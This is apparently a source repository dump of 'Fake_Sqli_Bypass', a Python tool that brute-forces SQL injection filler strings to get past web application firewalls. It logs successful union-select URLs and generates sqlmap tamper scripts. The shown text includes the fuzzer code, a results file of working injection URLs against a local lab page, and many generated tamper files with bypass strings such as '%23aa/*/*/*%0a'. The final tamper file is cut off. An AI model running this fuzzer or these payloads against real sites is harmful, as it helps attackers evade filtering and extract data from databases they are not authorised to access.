├── README.md ├── config └── settings.py ├── core ├── core.py ├── core_rule.py ├── core_tamper.py └── tamper.py ├── main.py ├── reustl └── 2kaWmSUK.txt └── tamper ├── 1qXnLaZt.py ├── 6pUbO49E.py ├── CtFNiUu7.py ├── GemX9jaw.py ├── HvT526x8.py ├── JPrYoOBp.py ├── NvT4KaS2.py ├── PUFt1WTK.py ├── QrUvl3pe.py ├── SU3botaZ.py ├── ScdTj24X.py ├── aBHpzUJt.py ├── akWiTqmb.py ├── fK4cXmhM.py ├── jPkopBzE.py ├── lw35khJV.py ├── nNkdOoSI.py ├── pkROU2yh.py ├── tm9qS0NR.py ├── tsi0Jpkc.py ├── wYVnJQl7.py ├── xY6FuKhe.py └── zKBxZXW5.py /README.md: -------------------------------------------------------------------------------- 1 | # Fake_Sqli_Bypass-自动化Fuzz Sqli/生成tamper 2 | ### Fake框架的自动化Fuzz WAF/IDS 功能 3 | ### 觉得使用还可以请点一个star让我体会一下工具也有人用的感觉 4 | 5 | 太久没写代码了,写的好丑hhhhhhhhh 6 |
7 | 其实这个功能点的开发并没有我想的这么简单,但是又非常的有意思,于是决定给他独立出来单独当一个功能,当然并不会在框架上分离出来. 8 | 至于后续的更新可能需要看情况以及有没有人使用,所以也没有一下子把功能写的非常完整,规则也是非常的简陋,直接采用网上现成的结果稍做修改。 9 |
10 | 规则也是非常的简陋,直接采用网上现成的结果稍做修改。 11 |
12 | 后续可能会依次更新规则库里面的规则,让它变得灵活化,人性化。 13 |
14 | 关于tamper的生成也比较简陋,但也还勉强能用 15 |
16 | 规则库后期采用WAF/IDS指纹对比,对应使用规则库,毕竟不同的waf拦截方式也是不同的,一个思路可能在这个waf上行不通在另外一个waf上可以绕过,正所谓术业有专攻,指定的waf有指定的payload,对于通用的还是很少的。 17 |
18 | 前期脚本只是放出来给大家娱乐娱乐,毕竟没有什么特别好用的操作 19 | 20 | >Author:思缘 21 | > 22 | >Team : [08Sec安全团队](https://www.08sec.org/) @校长办公室 23 | 24 | 25 | ## 使用方法 26 | 27 | 具体配置请修改config/settings.py 28 |
29 | 有些配置还没有写,只是摆设 30 | 31 | ``` 32 | git clone https://github.com/RandomSiYuan/Fake_Sqli_Bypass.git 33 | cd Fake_Sqli_Bypass 34 | python3 main.py 35 | ``` 36 | 37 | 38 | ## 已更新 39 | ### Fake_Sqli_Bypass v0.1 40 | 41 | 1.Fuzz 规则库更新 42 |
43 | 2.tamper生成 44 | 45 | ## Fake_Sqli_Bypass v0.1.5 46 | 47 | 1.Fuzz 规则库更新 48 | 49 | ## 预计更新 50 | ### Fake_Sqli_Bypass v0.2 51 | 52 | 1.Fuzz 规则库更新 53 |
54 | 2.proxy 代理池 55 |
56 | 3.WAF识别 对应WAF选择规则库 57 |
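--------------------------------------------------------------------------------
/config/settings.py:
--------------------------------------------------------------------------------
class settings:
    """Static configuration read by core/core.py and main.py."""

    # Base URL that each generated suffix is appended to. Defaults to the
    # local lab instance that the recorded results under reustl/ were produced
    # against, rather than a hard-coded remote address.
    url = "http://127.0.0.1/Less-1/?id=-1%27"
    # Substring core.py looks for in the response body to count a hit.
    str = "Your Login name:2"

    # Proxy pool configuration (not read by core/core.py as shown)
    porxy_host = "127.0.0.1"
    porxy_port = "8888"
    porxy_open = False

    # Result storage
    save_open = True
    save_method = "txt"  # mysql | txt
    save_url = "reustl/"

    # MySQL configuration (not read by core/core.py as shown)
    mysql_host = "127.0.0.1"
    ysql_host = mysql_host  # original misspelled name, kept for compatibility
    mysql_port = "3306"
    mysql_db = "fuzz_sql"

    # Threads (not read by core/core.py as shown; requests run sequentially)
    thread_num = 50

    # Tamper script generation
    tamper_dir = 'tamper/'
    tamper_open = True

    # info
    debug = 0

    # Every request carries this single fixed User-Agent.
    headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.3 6 SE 2.X MetaSr 1.0"}
--------------------------------------------------------------------------------
/core/core.py:
--------------------------------------------------------------------------------
import requests
from core import core_rule,core_tamper
from config import settings
import random
import string
from urllib.parse import quote

# Seconds to wait for each response. Without a timeout a single stalled
# connection blocks the whole sequential run.
REQUEST_TIMEOUT = 10

# One results-file name per process, shared by both entry points below.
txt_str = ''.join(random.sample(string.ascii_letters + string.digits, 8))


def _random_token(length):
    """Return *length* distinct random ASCII letters/digits (file-name use only)."""
    return ''.join(random.sample(string.ascii_letters + string.digits, length))


def _probe(url_start, payload, strs, echo_url=False):
    """Send one candidate request and record it when it counts as a hit.

    The request URL is ``url_start + "union" + payload + "(select%201,2,3)-- +"``.
    Every request therefore shares the same fixed frame and the same
    User-Agent from settings, and differs only in the filler between ``union``
    and ``(select``; a run appears in access logs as a long burst of such
    near-identical requests.

    A hit means the response body does not contain the literal ``"true"`` and
    does contain *strs*.
    NOTE(review): ``"true"`` is presumably a marker of the filtering layer's
    block page; confirm against the lab setup.

    Returns True on a hit, False otherwise (including on a failed request).
    """
    cfg = settings.settings
    url = url_start + "union" + payload + "(select%201,2,3)-- +"
    if echo_url:
        print(url)

    try:
        res = requests.get(url=url, headers=cfg.headers, timeout=REQUEST_TIMEOUT)
    except requests.RequestException as err:
        # One unreachable or reset connection must not abort the whole run.
        print("【!】Request failed:" + url + " | " + "%s" % err)
        return False

    if "true" in res.text or strs not in res.text:
        return False

    print("【*】Find Fuzz bypass:" + url + " | payload:" + payload)

    if cfg.tamper_open:
        # Honour the configured directory instead of a hard-coded 'tamper/'.
        tamper_path = cfg.tamper_dir + _random_token(8) + '.py'
        print("【+】Write Tamper: " + tamper_path)
        with open(tamper_path, 'w', encoding='utf-8') as f:
            f.write(core_tamper.tamper.return_def_tamper(payload))

    if cfg.save_open and cfg.save_method == "txt":
        # Report the path that is actually written (save_url, not tamper/).
        log_path = cfg.save_url + txt_str + '.txt'
        print("【+】Write Txt Log: " + log_path)
        with open(log_path, 'a', encoding='utf-8') as f:
            f.write(url + '\n')

    return True


class fuzz:
    """Two sequential request loops over the vocabularies in core_rule.

    main.py calls both methods on the class with ``object`` standing in for
    ``self``, so neither method may touch instance state.
    """

    def Ddun_start(self,url,strs):
        """Walk the comment-wrapped combinations and probe each one.

        For every comment opener from ``Comment_rule_base`` and every
        (a, b, c) drawn from the ``dseaf_rule_base`` lists, the filler is
        ``opener + tag + quote(a) + tag + quote(b) + c + closer`` where *tag*
        is a fresh two-character random token. Each URL is printed before it
        is requested.
        """
        fuzz = core_rule.rule.dseaf_rule_base(object)
        fuzz_payload = core_rule.rule.Comment_rule_base(object)
        closer = fuzz_payload['end'][0]

        for start in fuzz_payload['start']:
            for a in fuzz['fuzz_sz']:
                for b in fuzz['fuzz_sz']:
                    for c in fuzz['fuzz_zs']:
                        txt_str1 = _random_token(2)
                        payload = start+txt_str1+quote(a)+txt_str1+quote(b)+c+closer
                        _probe(url, payload, strs, echo_url=True)

    def fuzz_start(self,url,strs):
        """Walk every 4-tuple of the default vocabulary and probe each one.

        The filler is ``prefix + a + b + c + d + suffix`` with prefix/suffix
        taken from ``safedog_rule_base``. The same list is iterated four times
        over, so the request count is ``len(list) ** 4``.
        """
        fuzz = core_rule.rule.default_rule_base(object)
        fuzz_payload = core_rule.rule.safedog_rule_base(object)
        prefix = str(fuzz_payload[0])
        suffix = str(fuzz_payload[1])

        for a in fuzz:
            for b in fuzz:
                for c in fuzz:
                    for d in fuzz:
                        payload = prefix+a+b+c+d+suffix
                        _probe(url, payload, strs)
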
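--------------------------------------------------------------------------------
/core/core_rule.py:
--------------------------------------------------------------------------------
class rule:
    """Static vocabularies consumed by core/core.py.

    The methods take ``self`` but never use it; core.py calls them on the
    class and passes ``object`` in its place.
    """

    def default_rule_base(self):
        """Return the flat token list that fuzz.fuzz_start iterates four deep."""
        fuzz_zs = ['/*', '*/', '/*!', '*', '=', '`', '!', '@', '%', '.', '-', '+', '|', '%00']
        fuzz_sz = ['', ' ']
        fuzz_ch = ["%0b", "%0c", "%0d", "%0e", "%0f", "%0g", "%0h", "%0i", "%0j"]
        fuzz = fuzz_zs + fuzz_sz + fuzz_ch
        return fuzz

    def safedog_rule_base(self):
        """Return the [prefix, suffix] pair wrapped around each fuzz_start filler."""
        fuzz_payload = ["%23aa","%0a"]

        return fuzz_payload

    def Comment_rule_base(self):
        """Return the comment openers ("start") and closer ("end") used by fuzz.Ddun_start."""
        comment = {
            "start":["/*","/*!","/*!50000"],
            "end":["*/"]
        }
        return comment

    def dseaf_rule_base(self):
        """Return the two token lists ("fuzz_sz", "fuzz_zs") used by fuzz.Ddun_start."""
        fuzz = {
            "fuzz_sz" : [" ", "<", ">", "&", "&auot;", "'", "¢", "£", "¥", "&euro"],
            "fuzz_zs" : ["%00", "%20", "%0a", "%23", "0b", "%26", "%2b","%00"]
        }
        return fuzz

--------------------------------------------------------------------------------
/core/core_tamper.py:
--------------------------------------------------------------------------------
def _escape_for_literal(text):
    """Escape *text* so it can sit between double quotes in generated source.

    The generated file is Python that sqlmap later imports and executes, so a
    value containing a double quote, backslash or line break must not be able
    to end the string literal it is placed in.
    """
    return (text.replace('\\', '\\\\')
                .replace('"', '\\"')
                .replace('\n', '\\n')
                .replace('\r', '\\r'))


class tamper:
    """Generator for sqlmap tamper-script source text."""

    def __init__(self,payload):
        self.payload = payload

    @staticmethod
    def return_def_tamper(payload):
        """Return the source of a sqlmap tamper module that inserts *payload*.

        The template has two ``"{}"`` slots, both filled with *payload*; the
        generated ``tamper()`` emits that text for the first whitespace
        character and for each later space outside quotes.

        The docstring embedded in the template matches sqlmap's stock
        space-to-comment tamper; its "Tested against" list and doctest
        describe that script, not the substitution generated here.

        Declared static so that calls on an instance behave like the existing
        calls on the class.
        """
        template = '''#!/usr/bin/env python

"""
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces space character (' ') with comments '/**/'

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass weak and bespoke web application firewalls

    >>> tamper('SELECT id FROM users')
    'SELECT/**/id/**/FROM/**/users'
    """

    retVal = payload

    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += "{}"
                    continue

            elif payload[i] == '\\'':
                quote = not quote

            elif payload[i] == '"':
                doublequote = not doublequote

            elif payload[i] == " " and not doublequote and not quote:
                retVal += "{}"
                continue

            retVal += payload[i]

    return retVal'''

        # Escape before interpolating: the value lands inside a double-quoted
        # literal in a file that is executed on import.
        literal = _escape_for_literal(payload)
        return template.format(literal, literal)


# a = tamper.return_def_tamper('aaaaa')
# print(a)
--------------------------------------------------------------------------------
/core/tamper.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RandomSiYuan/Fake_Sqli_Bypass/bf091f9e5937ea6ffdc54c2ba9482c1f0d06631e/core/tamper.py
--------------------------------------------------------------------------------
/main.py:
--------------------------------------------------------------------------------
import requests
from core import core_rule
from config import settings
from core import core


def meun():
    """Print the start-up banner."""
    print("\r\r\r--------------------------------------------")
    print("\r\r\r--------------------------------------------")
    print("\r\r\r Author:SiYuan ")
    print("\r\r\r 08sec https://www.08sec.org/ ")
    print("\r\r\r @xzbgs ")
    print("\r\r\r--------------------------------------------")
    print("\r\r\r--------------------------------------------")



if __name__ == '__main__':
    meun()
    # Both loops run back to back against settings.url. The methods are
    # called on the class, with `object` passed where `self` is expected.
    core.fuzz.Ddun_start(object,settings.settings.url,settings.settings.str)
    core.fuzz.fuzz_start(object, settings.settings.url, settings.settings.str)
--------------------------------------------------------------------------------
/reustl/2kaWmSUK.txt: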
-------------------------------------------------------------------------------- 1 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/*/*%0a(select%201,2,3)-- + 2 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/**/%0a(select%201,2,3)-- + 3 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/*/*!%0a(select%201,2,3)-- + 4 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/**%0a(select%201,2,3)-- + 5 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/*=%0a(select%201,2,3)-- + 6 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/*`%0a(select%201,2,3)-- + 7 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/*!%0a(select%201,2,3)-- + 8 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/*@%0a(select%201,2,3)-- + 9 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/*.%0a(select%201,2,3)-- + 10 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/*-%0a(select%201,2,3)-- + 11 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/*+%0a(select%201,2,3)-- + 12 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/*|%0a(select%201,2,3)-- + 13 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/*%0a(select%201,2,3)-- + 14 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/* %0a(select%201,2,3)-- + 15 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/*%0b%0a(select%201,2,3)-- + 16 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/*%0c%0a(select%201,2,3)-- + 17 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/*%0d%0a(select%201,2,3)-- + 18 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/*%0e%0a(select%201,2,3)-- + 19 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/*/*%0f%0a(select%201,2,3)-- + 20 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/**//*%0a(select%201,2,3)-- + 21 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/**/*/%0a(select%201,2,3)-- + 22 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/**//*!%0a(select%201,2,3)-- + 23 | http://127.0.0.1/Less-1/?id=-1%27union%23aa/*/**/*%0a(select%201,2,3)-- + 24 | -------------------------------------------------------------------------------- 
/tamper/1qXnLaZt.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/*/*%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/*/*%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/6pUbO49E.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 
| * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/**/*/%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/**/*/%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/CtFNiUu7.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = 
True 42 | retVal += "%23aa/*/*/*/*%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/*/*/*%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/GemX9jaw.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/**//*%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/**//*%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/HvT526x8.py: 
-------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/*/*+%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/*/*+%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/JPrYoOBp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL 
Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/*/*%0e%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/*/*%0e%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/NvT4KaS2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal 
+= "%23aa/*/*/*|%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/*/*|%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/PUFt1WTK.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/*/*.%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/*/*.%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/QrUvl3pe.py: -------------------------------------------------------------------------------- 1 | 
#!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/**/*%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/**/*%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/SU3botaZ.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 
9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/*/*@%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/*/*@%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/ScdTj24X.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM 